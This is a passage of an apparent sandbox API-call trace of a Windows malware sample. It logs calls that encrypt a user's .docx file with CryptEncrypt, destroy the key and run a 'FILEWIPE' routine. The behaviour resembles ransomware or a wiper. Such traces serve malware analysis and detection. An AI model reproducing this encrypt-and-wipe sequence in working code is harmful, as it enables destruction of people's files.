lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.918] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.919] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.919] CharLowerBuffW (in: lpsz="byte[31041]", cchLength=0xb | out: lpsz="byte[31041]") returned 0xb [0036.919] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.920] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.920] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.920] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.920] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.920] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xad6bf0*, pdwDataLen=0x6ae220*=0x793e, dwBufLen=0x7940 | out: pbData=0xad6bf0*, pdwDataLen=0x6ae220*=0x7940) returned 1 [0036.920] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.921] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.921] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.922] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.922] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.922] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.922] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0036.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.923] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.923] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.923] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.923] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0036.923] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.923] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.923] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.923] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.923] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0036.923] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.926] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.927] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.927] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.929] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.929] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.929] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0036.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.929] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.929] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.930] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0036.930] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.930] CryptDestroyKey (hKey=0x7c2280) returned 1 [0036.930] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.930] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.930] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0036.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.930] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.930] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.930] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0036.930] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0036.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0036.930] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.930] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.930] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0036.930] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0036.931] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0036.931] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.931] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.931] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.931] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0036.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.931] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.931] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.931] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.931] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.931] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.931] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0036.931] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0036.931] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.931] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0036.932] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.932] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0036.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0036.932] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.932] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.932] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0036.932] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.932] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.932] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.932] FreeLibrary (hLibModule=0x754b0000) returned 1 [0036.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0036.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0036.932] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0036.932] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0036.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.932] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.932] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.933] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.933] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.934] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0036.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0036.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.934] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.934] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.934] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x410244d0, ftCreationTime.dwHighDateTime=0x1d5ba52, ftLastAccessTime.dwLowDateTime=0x2bd81670, ftLastAccessTime.dwHighDateTime=0x1d54c89, ftLastWriteTime.dwLowDateTime=0x2bd81670, ftLastWriteTime.dwHighDateTime=0x1d54c89, nFileSizeHigh=0x0, nFileSizeLow=0x793e, dwReserved0=0x0, dwReserved1=0x777648, cFileName="XTFgSi8S58kpp1FfY.docx", cAlternateFileName="XTFGSI~1.DOC")) returned 0x7c2100 [0036.934] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0036.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0036.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0036.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.934] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.934] CharLowerBuffW (in: lpsz="byte[31038]", cchLength=0xb | out: lpsz="byte[31038]") returned 0xb [0036.934] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.934] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0036.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.934] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.934] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0036.934] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0036.935] FreeLibrary (hLibModule=0x76b40000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0036.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0036.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.936] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.936] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.936] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.936] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0036.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0036.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 